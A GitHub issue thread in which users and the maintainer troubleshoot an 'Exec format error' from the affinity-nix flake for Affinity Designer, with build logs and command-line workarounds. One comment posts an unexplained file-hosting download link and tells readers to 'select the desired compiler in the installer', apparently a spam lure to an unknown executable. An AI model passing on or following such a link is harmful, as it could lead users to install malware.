### ISSUE TITLE
Exec format error

### ISSUE THREAD

**Issue by JeanMamelle** [mrshmllow/affinity-nix#8]
Hey, 

Thanks for your work, I'm trying to use this repo to automate an Affinity Install and encountered the following error: 
```
nix run github:mrshmllow/affinity-nix#designer --impure NIXPKGS_ALLOW_UNFREE=1
       ... (builds)
       >
       > ***
       > Unfortunately, we cannot download file affinity-designer-msi-2.5.5.exe automatically.
       > Please go to https://store.serif.com/en-gb/update/windows/designer/2/ to download it yourself, and add it to the Nix store
       > using either
       >   nix-store --add-fixed sha256 affinity-designer-msi-2.5.5.exe
       > or
       >   nix-prefetch-url --type sha256 file:///path/to/affinity-designer-msi-2.5.5.exe
       >
       > ***
       >
       For full logs, run 'nix log /nix/store/v9alfcaly9adzwckap8rm9akq34v83yl-affinity-designer-msi-2.5.5.exe.drv'.
```

I did that and downloaded Affinity on my own (the MSI EXE **NON-ARM** version) but this happens: 
```
error: unable to execute '/nix/store/yd76v406sg782rl09fxxv4vr7xir4v17-Affinity-Designer-2/bin/run-Affinity-Designer-2': Exec format error
```

Any suggestion  ?

**Comment by Abhijit-Guragain** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by JeanMamelle** [comment]
dirty fix: 
- I added a `XDG_DATA_HOME` 
- I manually ran the installer and created the .desktop using the scripts written in the `run-Affinity-Designer-2` file

**Comment by mrshmllow** [comment]
I am also experiencing this, executing that path manually works fine. May be a shebang thing? nix being weird

**Comment by mrshmllow** [comment]
Both issues appear to of been fixed :) Lemme know if its still broken for you.

**Comment by enesbala5** [comment]
I still have this issue. The flake is not working for me as of right now. I would really appreciate if you could take a look at it.

**Comment by mrshmllow** [comment]
Are you experiencing the exact same error log?

**Comment by enesbala5** [comment]
Yes

**Comment by mrshmllow** [comment]
I cannot reproduce a Exec format error, make sure to use the latest version of this repo. Maybe your not on x86?

**Comment by dezren39** [comment]
same thing here, amd framework laptop running flake-enabled nixos couldn't get the nix run command to work exec format error

**Comment by mrshmllow** [comment]
@dezren39 I cannot reproduce this on any of my nixos machines. Can you please make a new issue / discussion with reproducible steps?

**Comment by dezren39** [comment]
somehow now it's working? i don't know what changed. i added `--refresh`

**Comment by dezren39** [comment]
i also needed `--no-write-lock-file`
